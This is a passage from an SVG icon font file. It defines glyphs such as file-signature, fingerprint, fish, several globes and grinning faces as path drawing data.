d="M224 312c0 -13.2002 10.7998 -24 24 -24h136v-328c0 -13.2998 -10.7002 -24 -24 -24h-336c-13.2998 0 -24 10.7002 -24 24v464c0 13.2998 10.7002 24 24 24h200v-136zM292.53 132.52c-6.25 6.25 -16.3799 6.25 -22.6299 0l-29.9004 -29.8994l-33.46 33.46
c19.8398 10.8701 33.46 31.7002 33.46 55.9199c0 35.3496 -28.6504 64 -64 64h-80c-8.83984 0 -16 -7.16016 -16 -16v-160c0 -8.83984 7.16016 -16 16 -16h16c8.83984 0 16 7.16016 16 16v48h18.7402l59.3193 -59.3096l-30.0596 -30.0605
c-6.25 -6.25 -6.25 -16.3799 0 -22.6299l11.3096 -11.3096c6.25 -6.25 16.3809 -6.25 22.6309 0l30.0596 30.0596l30.0596 -30.0703c6.25 -6.25 16.3809 -6.25 22.6309 0l11.3096 11.3105c6.25 6.25 6.25 16.3799 0 22.6299l-30.0596 30.0596l29.8994 29.9004
c6.25 6.25 6.25 16.3799 0 22.6299zM176 176h-48v32h48c8.82031 0 16 -7.17969 16 -16s-7.17969 -16 -16 -16zM384 326.1v-6.09961h-128v128h6.09961c6.40039 0 12.5 -2.5 17 -7l97.9004 -98c4.5 -4.5 7 -10.5996 7 -16.9004z" />
    <glyph glyph-name="file-signature" unicode="&#xf573;" horiz-adv-x="576" 
d="M218.17 23.8604c7.25 -14.4707 21.71 -23.4404 37.8301 -23.75l128 -0.110352v-40c0 -13.2998 -10.7002 -24 -24 -24h-336c-13.2998 0 -24 10.7002 -24 24v464c0 13.2998 10.7002 24 24 24h200v-136c0 -13.2002 10.7998 -24 24 -24h136.01v-46.5498l-128 -127.09
v-82.1201c-3.87012 0.30957 -7.46973 2.47949 -9.35938 6.25977c-11.9404 23.8604 -46.25 30.3496 -66 14.1602l-13.8809 41.6396c-3.28906 9.82031 -12.4297 16.4102 -22.7695 16.4102s-19.4805 -6.59961 -22.7803 -16.4102l-18.1895 -54.6396
c-1.53027 -4.58008 -5.81055 -7.66016 -10.6406 -7.66016h-12.3896c-8.83984 0 -16 -7.16016 -16 -16s7.16016 -16 16 -16h12.3896c18.6201 0 35.1104 11.8701 41 29.5303l10.6104 31.8799l16.8301 -50.4697c4.4502 -13.46 23.1104 -14.8701 29.4795 -2.09082
l7.6709 15.3408c2.7998 5.59961 7.93945 6.18945 10.0195 6.18945s7.21973 -0.599609 10.1699 -6.51953zM384 326.1v-6.09961h-128v128h6.09961c6.40039 0 12.5 -2.5 17 -7l97.9004 -98c4.5 -4.5 7 -10.5996 7 -16.9004zM288 101.04l162.79 161.62l67.8799 -67.8799
l-161.68 -162.78h-68.9902v69.04zM568.54 280.67c9.9502 -9.93945 9.9502 -26.0703 0 -36.0098l-27.25 -27.25l-67.8799 67.8799l27.25 27.25c9.93945 9.94043 26.0703 9.94043 36.0098 0z" />
    <glyph glyph-name="file-upload" unicode="&#xf574;" horiz-adv-x="384" 
d="M224 312c0 -13.2002 10.7998 -24 24 -24h136v-328c0 -13.2998 -10.7002 -24 -24 -24h-336c-13.2998 0 -24 10.7002 -24 24v464c0 13.2998 10.7002 24 24 24h200v-136zM289.18 95.9902c14.2803 0 21.4004 17.29 11.25 27.3594l-96.4199 95.7002
c-6.64941 6.61035 -17.3896 6.61035 -24.04 0l-96.4199 -95.7002c-10.1396 -10.0693 -3.00977 -27.3594 11.2705 -27.3594h65.1797v-80c0 -8.83984 7.16016 -16 16 -16h32c8.83984 0 16 7.16016 16 16v80h65.1797zM377 343c4.5 -4.5 7 -10.5996 7 -16.9004v-6.09961h-128
v128h6.09961c6.40039 0 12.5 -2.5 17 -7z" />
    <glyph glyph-name="fill" unicode="&#xf575;" 
d="M502.63 230.94c12.4902 -12.5 12.4902 -32.7607 0 -45.2607l-221.57 -221.569c-18.75 -18.75 -43.3096 -28.1201 -67.8799 -28.1201c-24.5596 0 -49.1201 9.37988 -67.8701 28.1201l-117.189 117.189c-37.4902 37.4902 -37.4902 98.2598 0 135.75l94.7598 94.7598
l-86.1895 86.1807c-6.24023 6.25 -6.24023 16.3799 0 22.6299l22.6191 22.6104c6.24023 6.25 16.3809 6.25 22.6201 0l86.1807 -86.1807l81.5801 81.5801c6.23926 6.25 14.4297 9.37012 22.6191 9.37012c8.19043 0 16.3809 -3.12012 22.6309 -9.37012zM386.41 159.97
l48.3496 48.3398l-162.45 162.44l-58.9492 -58.9502l58.6094 -58.5996c12.4902 -12.4902 12.4902 -32.75 0 -45.2402c-12.4893 -12.4902 -32.75 -12.4902 -45.2393 0l-58.6104 58.5996l-81.6104 -81.6094l-13.1494 -13.1504
c-3.86035 -3.84961 -6.07031 -7.99023 -7.43066 -11.8301h320.48z" />
    <glyph glyph-name="fill-drip" unicode="&#xf576;" horiz-adv-x="576" 
d="M512 128c0 0 64 -92.6504 64 -128s-28.6602 -64 -64 -64s-64 28.6504 -64 64s64 128 64 128zM502.63 230.94c12.4902 -12.5 12.4902 -32.75 -0.00976562 -45.25l-221.57 -221.57c-18.7402 -18.75 -43.2998 -28.1201 -67.8701 -28.1201
c-24.5596 0 -49.1299 9.37988 -67.8701 28.1201l-117.189 117.189c-37.4902 37.4902 -37.4902 98.2705 0 135.75l94.7598 94.7607l-86.1895 86.1797c-6.24023 6.24023 -6.24023 16.3701 0 22.6201l22.6191 22.6201c6.24023 6.25 16.3701 6.25 22.6201 0l86.1807 -86.1904
l81.5801 81.5801c6.23926 6.25 14.4297 9.37012 22.6191 9.37012c8.19043 0 16.3809 -3.12012 22.6309 -9.37012zM386.41 159.97l48.3398 48.3398l-162.44 162.44l-58.9492 -58.9502l58.5996 -58.5996c12.4902 -12.4902 12.4902 -32.75 0 -45.2402
s-32.75 -12.4902 -45.2402 0l-58.5996 58.5996l-81.6104 -81.6094l-13.1494 -13.1504c-3.86035 -3.84961 -6.07031 -7.99023 -7.43066 -11.8301h320.48z" />
    <glyph glyph-name="fingerprint" unicode="&#xf577;" 
d="M256.12 202.04c13.2598 0 24 -10.75 23.9902 -24c1.55957 -99.1104 -15.9502 -176.61 -29.4805 -224.521c-2.97949 -10.5996 -12.6104 -17.5195 -23.0898 -17.5195c-20.9697 0 -25.8496 20.7695 -23.1201 30.4902c19.5605 69.6494 28.8398 139.3 27.7002 211.55
c0 13.2598 10.75 24 24 24zM255.26 283.77c56.9707 -0.839844 104.03 -46.9199 104.91 -102.72c0.790039 -50.8994 -2.99023 -102.08 -11.2695 -152.109c-0.770508 -4.6709 -7.61035 -23.1006 -27.5801 -19.7705c-13.0703 2.16016 -21.9307 14.5205 -19.7607 27.5801
c7.80078 47.2197 11.3809 95.5 10.6104 143.55c-0.469727 30.1299 -26.3096 55 -57.6201 55.4697c-34.5303 0.150391 -54.8594 -26.3896 -54.4502 -52.3398c0.800781 -51.4395 -4.0293 -102.93 -14.3691 -153.02c-2.69043 -12.9805 -15.3105 -21.3105 -28.3604 -18.6406
c-12.9697 2.6709 -21.3301 15.3809 -18.6396 28.3604c9.61914 46.6396 14.1191 94.6104 13.3691 142.55c-0.849609 54.0205 41.9004 101.16 103.16 101.09zM144.57 303.55c10.2793 -8.37012 11.8398 -23.4795 3.48926 -33.7598
c-18.7998 -23.0898 -28.4697 -51.0898 -28 -80.9697c0.640625 -40.6699 -2.66992 -81.4902 -9.85938 -121.33c-0.820312 -4.5498 -7.78027 -22.8604 -27.8906 -19.3604c-13.0498 2.36035 -21.6992 14.8398 -19.3594 27.8896c6.63965 36.7803 9.7002 74.4707 9.10938 112.051
c-0.639648 40.7197 13.1309 80.5 38.75 112c8.39062 10.2793 23.46 11.8193 33.7607 3.47949zM254.04 365.88c101.09 -1.5 184.6 -83.0801 186.16 -181.83c0.0615234 -3.97852 0.111328 -10.4375 0.111328 -14.417c0 -29.1934 -2.68848 -76.4277 -6.00195 -105.433
c-1.06934 -9.23047 -9.85938 -23.0605 -26.5791 -21.1104c-13.1602 1.5 -22.6104 13.4102 -21.1104 26.5801c4.2998 37.5205 6.16992 75.75 5.58008 113.63c-1.15039 73.0801 -63.4502 133.45 -138.88 134.58c-11.5303 0.0800781 -22.9502 -1.08008 -34 -3.68945
c-12.8906 -3 -25.8301 4.93945 -28.8906 17.8291c-3.04004 12.9102 4.94043 25.8301 17.8301 28.8906c14.9102 3.53027 30.3701 5.37988 45.7803 4.96973zM506.11 244.43c6.22949 -28.2295 6.00977 -50.1602 5.83008 -72.3398
c-0.110352 -13.1895 -10.8301 -23.7998 -24 -23.7998h-0.200195c-13.25 0.110352 -23.9102 10.9297 -23.7998 24.2002c0.209961 24.1895 0.00976562 40.1895 -4.7002 61.5996c-2.86035 12.9502 5.31934 25.75 18.2598 28.6104
c13.0996 2.92969 25.75 -5.35059 28.6104 -18.2705zM465.99 335.15c7.62012 -10.8408 5 -25.8105 -5.83984 -33.4307c-10.8604 -7.58984 -25.8105 -5 -33.4199 5.86035c-39.8906 56.8301 -105.171 91.3604 -174.62 92.3896
c-56.3408 0.810547 -108.92 -20.0596 -147.681 -58.8594c-37.1201 -37.1406 -57.1094 -86.5 -56.2793 -139l-0.160156 -23.6406c-0.379883 -13 -11.0498 -23.2998 -23.9707 -23.2998c-0.239258 0 -0.489258 0 -0.719727 0.0205078
c-13.25 0.379883 -23.6699 11.4395 -23.2803 24.6895l0.120117 21.4697c-1.04004 65.6104 23.9502 127.28 70.3203 173.71c48.0098 48.0303 112.56 73.7607 182.35 72.9209c84.79 -1.27051 164.48 -43.4404 213.181 -112.83z" />
    <glyph glyph-name="fish" unicode="&#xf578;" horiz-adv-x="576" 
d="M327.1 352c137.46 0 248.9 -128 248.9 -160s-111.44 -160 -248.9 -160c-89.9697 0 -168.55 54.7695 -212.279 101.62l-87.3301 -66.0498c-12.1299 -9.16992 -30.2402 0.599609 -27.1406 14.6602l24.1904 109.77l-24.1797 109.76
c-3.10059 14.0605 15.0098 23.8398 27.1396 14.6602l87.3301 -66.0498c43.7295 46.8604 122.3 101.63 212.27 101.63zM414.53 168c13.25 0 24 10.75 24 24c0 13.2598 -10.7402 24 -24 24c-13.25 0 -24 -10.7402 -24 -24c0 -13.25 10.75 -24 24 -24z" />
    <glyph glyph-name="flushed" unicode="&#xf579;" horiz-adv-x="496" 
d="M344 248c13.2998 0 24 -10.7002 24 -24s-10.7002 -24 -24 -24s-24 10.7002 -24 24s10.7002 24 24 24zM152 248c13.2998 0 24 -10.7002 24 -24s-10.7002 -24 -24 -24s-24 10.7002 -24 24s10.7002 24 24 24zM248 440c137 0 248 -111 248 -248s-111 -248 -248 -248
s-248 111 -248 248s111 248 248 248zM80 224c0 -39.7998 32.2002 -72 72 -72s72 32.2002 72 72s-32.2002 72 -72 72s-72 -32.2002 -72 -72zM312 48c21.2002 0 21.2002 32 0 32h-128c-21.2002 0 -21.2002 -32 0 -32h128zM344 152c39.7998 0 72 32.2002 72 72
s-32.2002 72 -72 72s-72 -32.2002 -72 -72s32.2002 -72 72 -72z" />
    <glyph glyph-name="frown-open" unicode="&#xf57a;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM136 240c0 -17.7002 14.2998 -32 32 -32s32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32zM323.3 56.7002c11.4004 -3.5 22.5 6.2002 20.5 18.0996
c-7 39.9004 -60.0996 61.2002 -95.7998 61.2002s-88.7998 -21.2002 -95.7998 -61.2002c-2 -11.7998 9 -21.5996 20.5 -18.0996c31.2002 9.59961 59.3994 15.2998 75.2998 15.2998s44.0996 -5.7002 75.2998 -15.2998zM328 208c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32
s-32 -14.2998 -32 -32s14.2998 -32 32 -32z" />
    <glyph glyph-name="glass-martini-alt" unicode="&#xf57b;" 
d="M502.05 390.4l-214.05 -214.04v-192.36h56c22.0898 0 40 -17.9102 40 -40c0 -4.41992 -3.58008 -8 -8 -8h-240c-4.41992 0 -8 3.58008 -8 8c0 22.0898 17.9102 40 40 40h56v192.36l-214.05 214.04c-21.25 21.2598 -6.2002 57.5996 23.8496 57.5996h444.4
c30.0498 0 45.0996 -36.3398 23.8496 -57.5996zM443.77 400h-375.529l48 -48h279.529z" />
    <glyph glyph-name="globe-africa" unicode="&#xf57c;" horiz-adv-x="496" 
d="M248 440c136.97 0 248 -111.03 248 -248s-111.03 -248 -248 -248s-248 111.03 -248 248s111.03 248 248 248zM408 224.5c0 8.55957 6.94043 15.5 15.5 15.5h18.4297c-19.0693 76.9805 -82.6992 136.37 -161.92 149.21v-21.7002c0 -8.55957 -6.93945 -15.5 -15.5 -15.5
h-24.21c-5.17969 0 -10.0195 -2.58984 -12.8896 -6.89941l-8.08008 -12.1104c-2.13965 -3.20996 -5.40039 -5.5 -9.13965 -6.44043l-14.4502 -3.60938c-6.90039 -1.73047 -11.7402 -7.93066 -11.7402 -15.04v-4.40039c0 -8.55957 6.94043 -15.5 15.5 -15.5h90.0498
h0.00292969c3.54297 0 8.45215 -2.0332 10.957 -4.54004l6.91992 -6.91992c2.91016 -2.91016 6.85059 -4.54004 10.96 -4.54004h10.0908c8.55957 0 15.5 -6.93945 15.5 -15.5c0 -6.66992 -4.27051 -12.5898 -10.6006 -14.7002l-47.3096 -15.7695
c-3.90039 -1.2998 -8.15039 -1 -11.8301 0.839844l-14.7207 7.36035c-7.5791 3.7998 -15.9492 5.76953 -24.4297 5.76953h-0.889648c-10.0527 -0.00195312 -24.7383 -4.89941 -32.7803 -10.9297l-27.5801 -20.6904c-13.75 -10.3193 -21.8496 -26.5098 -21.8496 -43.6992
v-14.0605c0.00195312 -12.4902 7.16992 -29.7959 16 -38.6299c10.25 -10.2402 24.1396 -16 38.6299 -16h25.8799c8.55957 0 15.5 -6.94043 15.5 -15.5v-29.8896v-0.00390625c0 -10.2822 3.73145 -26.0898 8.33008 -35.2861
c4.7002 -9.40039 14.3096 -15.3398 24.8203 -15.3398c8.19824 0.000976562 18.542 5.53809 23.0898 12.3594l13.0293 19.5498c5.9248 8.88477 17.125 21.9482 25 29.1602c2.4707 2.27051 4.14062 5.27051 4.76074 8.56055l4.2998 22.8301
c0.439453 2.3291 1.41016 4.5293 2.83008 6.42969l18.7402 24.9795c2.00977 2.68066 3.09961 5.9502 3.09961 9.30078v11.3398c0 8.55957 -6.94043 15.5 -15.5 15.5h-8.20996c-5.17969 0 -10.0205 2.58984 -12.8896 6.89941l-13.2402 19.8604
c-5.66992 8.50977 -1.70996 20.0703 7.99023 23.2998l2.64941 0.879883c1.31641 0.4375 3.50977 0.792969 4.89746 0.792969c2.5918 0 6.44531 -1.16602 8.60254 -2.60254l18.21 -12.1396c2.15527 -1.43945 6.00781 -2.60742 8.59961 -2.60742
c2.01953 0 5.125 0.733398 6.93066 1.63672l15.3896 7.7002c5.25 2.62012 8.57031 7.99023 8.57031 13.8604v6.92969z" />
    <glyph glyph-name="globe-americas" unicode="&#xf57d;" horiz-adv-x="496" 
d="M248 440c136.97 0 248 -111.03 248 -248s-111.03 -248 -248 -248s-248 111.03 -248 248s111.03 248 248 248zM330.29 82.4004c7.56934 7.52832 13.7168 22.3037 13.7197 32.9795v0.00488281c0 6.97266 -4 16.6338 -8.92969 21.5654l-13.6904 13.6895
c-6.00977 6 -14.1396 9.37012 -22.6299 9.37012h-66.75c-9.41016 4.70996 -21.4795 32 -32 32c-10.5195 0 -20.8994 2.4502 -30.3096 7.16016l-11.0801 5.54004c-4.0498 2.03027 -6.61035 6.16016 -6.61035 10.6904v0.00292969c0 4.75391 3.66016 9.83301 8.16992 11.3369
l31.1699 10.3896c1.3584 0.452148 3.62305 0.818359 5.05469 0.818359c3.30078 0 8.00293 -1.75488 10.4961 -3.91797l9.2793 -8.06055c1.4502 -1.25977 3.31055 -1.95996 5.24023 -1.95996h5.63965c5.94043 0 9.81055 6.25977 7.15039 11.5801l-15.5898 31.1904
c-0.464844 0.931641 -0.84082 2.53223 -0.84082 3.57227c0 1.86621 1.08398 4.43555 2.4209 5.7373l9.91992 9.65039c1.5 1.45996 3.5 2.26953 5.58008 2.26953h8.99023h0.00292969c1.82812 0 4.3623 1.04883 5.65625 2.33984l8 8
c3.12012 3.12012 3.12012 8.19043 0 11.3105l-4.68945 4.68945c-3.12012 3.12012 -3.12012 8.19043 0 11.3105l10.3398 10.3398l4.69043 4.67969c6.25 6.25 6.25 16.3799 0 22.6299l-28.3008 28.3008c-8.26953 -0.310547 -16.3994 -1.12988 -24.3896 -2.41992v-11.3008
c0 -11.8994 -12.5195 -19.6299 -23.1602 -14.3096l-24.0098 12.0098c-45.8398 -19.8496 -82.7305 -56.3896 -103.2 -101.89c9.92969 -14.7197 25.21 -37.3701 34.5898 -51.1406c4.29395 -6.3252 12.3848 -15.6172 18.0605 -20.7393l0.799805 -0.720703
c9.5498 -8.60938 20.1699 -15.9697 31.6504 -21.75c14 -7.0498 34.4395 -18.1592 48.8096 -26.1094c10.1904 -5.62988 16.46 -16.3301 16.46 -27.9707v-32.0098c0 -8.49023 3.37012 -16.6299 9.37012 -22.6299c14.9902 -14.9902 24.3203 -38.6299 22.6299 -51.25v-27.3799
c14.6504 0 28.8896 1.69043 42.6504 4.69043l17.3896 46.8496c2.04004 5.49023 3.25977 11.21 4.76953 16.8701c1.07031 4.00977 3.18066 7.70996 6.1709 10.71c3.31934 3.33008 7.40918 7.39941 11.3096 11.2803zM417 173.75l29.1797 -7.29004
c1.08008 8.37988 1.82031 16.8701 1.82031 25.54c0 32.1299 -7.7998 62.4102 -21.3203 89.3301l-12.9795 -6.49023c-3.74023 -1.85938 -6.91992 -4.67969 -9.24023 -8.14941l-19.5898 -29.3809c-2.22754 -3.33594 -4.03516 -9.29883 -4.03516 -13.3096
s1.80762 -9.97363 4.03516 -13.3096l17.9795 -26.9707c3.31055 -4.96973 8.36035 -8.51953 14.1504 -9.96973z" />
    <glyph glyph-name="globe-asia" unicode="&#xf57e;" horiz-adv-x="496" 
d="M248 440c136.97 0 248 -111.03 248 -248s-111.03 -248 -248 -248s-248 111.03 -248 248s111.03 248 248 248zM236.66 199.77l17.3701 28.9502c1.7998 2.99023 6.2002 2.82031 7.75977 -0.299805c1.34961 -2.70996 4.12012 -4.41992 7.15039 -4.41992h3.05957
c4.41992 0 8 3.58008 8 8v78.1201c0 6.05957 -3.41992 11.5996 -8.83984 14.3096l-10.8301 5.41016c-5.49023 2.75 -5.96973 10.4004 -0.860352 13.8105l50.1602 38.5293c-19.4297 6.31055 -40.1201 9.82031 -61.6299 9.82031c-110.28 0 -200 -89.7197 -200 -200
c0 -10.9199 1.12012 -21.5498 2.80957 -31.9902h62.5703c4.24023 0 8.31055 1.69043 11.3105 4.69043l19.4697 19.46c3.85938 3.85938 10.3701 2.7998 12.8096 -2.08008l22.6201 -45.2305c2.70996 -5.42969 8.25 -8.84961 14.3105 -8.84961h6.10938
c8.83984 0 16 7.16016 16 16v9.37012c0 4.24023 -1.68945 8.30957 -4.68945 11.3096l-5.66016 5.66016c-3.12012 3.12012 -3.12012 8.19043 0 11.3105l5.66016 5.65918c3 3 7.06934 4.69043 11.3096 4.69043h0.310547c5.61914 0 10.8291 2.9502 13.7197 7.76953z
M408 89.5703l-0.00976562 24.5996c0 4.24023 -1.69043 8.31055 -4.69043 11.3105l-11.9102 11.9092c-1.5 1.5 -2.33984 3.54004 -2.33984 5.66016v12.9307c0 2.20996 -1.79004 4 -4 4h-6.05957c-1.78027 0 -3.33984 -1.1709 -3.83984 -2.88086l-4.2002 -14.4697
c-0.490234 -1.7002 -2.06055 -2.87988 -3.83984 -2.87988h-3.80078c-1.4707 0.000976562 -3.12305 1.10254 -3.68945 2.45996l-5.35059 12.8496c-1.23926 2.99023 -4.15918 4.93066 -7.38965 4.93066h-12.0898h-0.0117188c-1.4082 0 -3.48145 -0.663086 -4.62793 -1.48047
l-23.71 -16.8896c-1.73047 -1.23047 -3.61035 -2.25977 -5.59082 -3.0498l-39.3398 -15.7402c-3.04004 -1.21973 -5.0293 -4.16016 -5.0293 -7.42969v-10.2002v-0.00292969c0 -1.8291 1.04785 -4.36328 2.33984 -5.65723l11.9102 -11.9102
c3 -3 7.06934 -4.68945 11.3096 -4.68945h10.3398c1.31055 0 2.61035 0.15918 3.87988 0.479492l21.2705 5.32031c1.76465 0.441406 4.67383 0.798828 6.49316 0.798828c6.12012 0 14.5986 -3.51172 18.9268 -7.83887l13.0098 -13.0098
c3 -3 7.07031 -4.69043 11.3096 -4.69043h15.1602c4.24023 0 8.31055 1.69043 11.3105 4.69043l9.56934 9.56934c3 3 4.69043 7.07031 4.69043 11.3105z" />
    <glyph glyph-name="grimace" unicode="&#xf57f;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM144 48v40h-40v-8c0 -17.7002 14.2998 -32 32 -32h8zM144 104v40h-8c-17.7002 0 -32 -14.2998 -32 -32v-8h40zM136 240c0 -17.7002 14.2998 -32 32 -32s32 14.2998 32 32
s-14.2998 32 -32 32s-32 -14.2998 -32 -32zM208 48v40h-48v-40h48zM208 104v40h-48v-40h48zM272 48v40h-48v-40h48zM272 104v40h-48v-40h48zM336 48v40h-48v-40h48zM336 104v40h-48v-40h48zM328 208c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32
s14.2998 -32 32 -32zM392 80v8h-40v-40h8c17.7002 0 32 14.2998 32 32zM392 104v8c0 17.7002 -14.2998 32 -32 32h-8v-40h40z" />
    <glyph glyph-name="grin" unicode="&#xf580;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM328 272c-17.7002 0 -32 -14.2998 -32 -32s14.2998 -32 32 -32s32 14.2998 32 32s-14.2998 32 -32 32zM168 272c-17.7002 0 -32 -14.2998 -32 -32s14.2998 -32 32 -32
s32 14.2998 32 32s-14.2998 32 -32 32zM248 16c60.5996 0 134.5 38.2998 143.8 93.2998c1.90039 11.7998 -9.39941 21.6006 -20.7002 17.9004c-30.1992 -9.7002 -75.0996 -15.2002 -123.1 -15.2002s-92.9004 5.5 -123.1 15.2002
c-11.4004 3.7002 -22.7002 -6.10059 -20.7002 -17.9004c9.2998 -55 83.2002 -93.2998 143.8 -93.2998z" />
    <glyph glyph-name="grin-alt" unicode="&#xf581;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM311.7 311.3c-12.4004 -18.3994 -15.2002 -36.8994 -15.7002 -55.2998c0.599609 -18.4004 3.2998 -36.9004 15.7002 -55.2998c8 -11.7002 25.0996 -11.4004 32.7002 0
c12.3994 18.3994 15.1992 36.8994 15.6992 55.2998c-0.599609 18.4004 -3.2998 36.9004 -15.6992 55.2998c-8 11.7002 -25.1006 11.4004 -32.7002 0zM151.7 311.3c-12.4004 -18.3994 -15.2002 -36.8994 -15.7002 -55.2998
c0.599609 -18.4004 3.2998 -36.9004 15.7002 -55.2998c8 -11.7002 25.0996 -11.4004 32.7002 0c12.3994 18.3994 15.1992 36.8994 15.6992 55.2998c-0.599609 18.4004 -3.2998 36.9004 -15.6992 55.2998c-8 11.7002 -25.1006 11.4004 -32.7002 0zM248 16
c60.5996 0 134.5 38.2998 143.8 93.2998c1.90039 11.7998 -9.2998 21.6006 -20.7002 17.9004c-30.1992 -9.7002 -75.0996 -15.2002 -123.1 -15.2002s-92.9004 5.5 -123.1 15.2002c-11.4004 3.7002 -22.7002 -6.10059 -20.7002 -17.9004
c9.2998 -55 83.2002 -93.2998 143.8 -93.2998z" />
    <glyph glyph-name="grin-beam" unicode="&#xf582;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM328 296c-23.7998 0 -52.7002 -29.2998 -55.7998 -71.4004c-0.700195 -8.5 10.7998 -11.7998 14.8994 -4.5l9.5 17c7.7002 13.7002 19.2002 21.6006 31.5 21.6006
c12.3008 0 23.8008 -7.90039 31.5 -21.6006l9.5 -17c4.10059 -7.39941 15.6006 -4.09961 14.9004 4.5c-3.2998 42.1006 -32.2002 71.4004 -56 71.4004zM168 296c-23.7998 0 -52.7002 -29.2998 -55.7998 -71.4004c-0.700195 -8.5 10.7002 -11.8994 14.8994 -4.5l9.5 17
c7.7002 13.7002 19.2002 21.6006 31.5 21.6006c12.3008 0 23.8008 -7.90039 31.5 -21.6006l9.5 -17c4.10059 -7.39941 15.6006 -4.09961 14.9004 4.5c-3.2998 42.1006 -32.2002 71.4004 -56 71.4004zM248 16c60.5996 0 134.5 38.2998 143.8 93.2998
c1.90039 11.7998 -9.2998 21.6006 -20.7002 17.9004c-30.1992 -9.7002 -75.0996 -15.2002 -123.1 -15.2002s-92.9004 5.5 -123.1 15.2002c-11.3008 3.7002 -22.7002 -6 -20.7002 -17.9004c9.2998 -55 83.2002 -93.2998 143.8 -93.2998z" />
    <glyph glyph-name="grin-beam-sweat" unicode="&#xf583;" horiz-adv-x="504" 
d="M456 320c-26.5 0 -48 21 -48 47c0 20 28.5 60.4004 41.5996 77.7998c3.2002 4.2998 9.60059 4.2998 12.8008 0c13.0996 -17.3994 41.5996 -57.7998 41.5996 -77.7998c0 -26 -21.5 -47 -48 -47zM456 288c6.7998 0 13.2002 1.09961 19.5 2.59961
c13.0996 -30.1992 20.5 -63.5 20.5 -98.5996c0 -137 -111 -248 -248 -248s-248 111 -248 248s111 248 248 248c50.2998 0 97 -15.0996 136.1 -40.7998c-7.7998 -18 -8.09961 -27.7998 -8.09961 -32.2002c0 -43.5996 35.9004 -79 80 -79zM328 296
c-23.7998 0 -52.7002 -29.2998 -55.7998 -71.4004c-0.700195 -8.5 10.7998 -11.8994 14.8994 -4.5l9.5 17c7.7002 13.7002 19.2002 21.6006 31.5 21.6006c12.3008 0 23.8008 -7.90039 31.5 -21.6006l9.5 -17c4.10059 -7.5 15.6006 -4.09961 14.9004 4.5
c-3.2998 42.1006 -32.2002 71.4004 -56 71.4004zM168 296c-23.7998 0 -52.7002 -29.2998 -55.7998 -71.4004c-0.700195 -8.5 10.7002 -11.8994 14.8994 -4.5l9.5 17c7.7002 13.7002 19.2002 21.6006 31.5 21.6006c12.3008 0 23.8008 -7.90039 31.5 -21.6006l9.5 -17
c4.10059 -7.5 15.6006 -4.09961 14.9004 4.5c-3.2998 42.1006 -32.2002 71.4004 -56 71.4004zM248 16c60.5996 0 134.5 38.2998 143.8 93.2998c1.90039 11.7002 -9.2002 21.6006 -20.7002 17.9004c-30.1992 -9.7002 -75.0996 -15.2002 -123.1 -15.2002
s-92.9004 5.5 -123.1 15.2002c-11.4004 3.7002 -22.7002 -6.10059 -20.7002 -17.9004c9.2998 -55 83.2002 -93.2998 143.8 -93.2998z" />
    <glyph glyph-name="grin-hearts" unicode="&#xf584;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM90.4004 264.4c-7.7002 -20.2002 3.7998 -41.8008 24.1992 -47.2002l70.2002 -18.2002c4.60059 -1.2002 9.2998 1.5 10.5 6l19.4004 69.9004
c5.59961 20.2998 -7.40039 41.0996 -28.7998 44.5c-18.7002 3 -36.5 -9.80078 -41.5 -27.9004l-2 -7.09961l-7.10059 1.89941c-18.2002 4.7998 -38.2002 -4.2998 -44.8994 -21.8994zM248 16c60.5996 0 134.5 38.2998 143.8 93.2998
c1.90039 11.7998 -9.2998 21.5 -20.7002 17.9004c-30.1992 -9.7002 -75.0996 -15.2002 -123.1 -15.2002s-92.9004 5.5 -123.1 15.2002c-11.5 3.59961 -22.7002 -6.10059 -20.7002 -17.9004c9.2998 -55 83.2002 -93.2998 143.8 -93.2998zM381.4 217.3
c20.3994 5.2998 31.8994 26.9004 24.1992 47.2002c-6.69922 17.5996 -26.6992 26.5996 -44.8994 21.9004l-7.10059 -1.90039l-2 7.09961c-5.09961 18.1006 -22.8994 30.9004 -41.5 27.9004c-21.3994 -3.40039 -34.3994 -24.2002 -28.7998 -44.5l19.4004 -69.9004
c1.2998 -4.5 6 -7.19922 10.5 -6z" />
    <glyph glyph-name="grin-squint" unicode="&#xf585;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM281.8 250.3c-7.7002 -4.7002 -7.7002 -15.8994 0 -20.5996l80 -48c11.5 -6.7998 24.1006 7.59961 15.4004 18l-33.6006 40.2998l33.6006 40.2998
c8.59961 10.2998 -3.7998 24.9004 -15.4004 18zM118.8 280.3l33.6006 -40.2998l-33.6006 -40.2998c-8.59961 -10.4004 3.90039 -24.7998 15.4004 -18l80 48c7.7998 4.7002 7.7998 15.8994 0 20.5996l-80 48c-11.6006 6.90039 -24 -7.7002 -15.4004 -18zM248 16
c60.5996 0 134.5 38.2998 143.8 93.2998c1.90039 11.7002 -9.2002 21.6006 -20.7002 17.9004c-30.1992 -9.7002 -75.0996 -15.2002 -123.1 -15.2002s-92.9004 5.5 -123.1 15.2002c-11.3008 3.7002 -22.7002 -6 -20.7002 -17.9004
c9.2998 -55 83.2002 -93.2998 143.8 -93.2998z" />
    <glyph glyph-name="grin-squint-tears" unicode="&#xf586;" 
d="M409.6 336.1c-5.59961 -0.799805 -10.2998 3.90039 -9.5 9.40039c3.30078 22.5996 12 73.5 26.8008 88.2998c19.0996 19.2002 50.6992 18.9004 70.2998 -0.700195c19.5996 -19.5996 19.8994 -51 0.700195 -70.1992
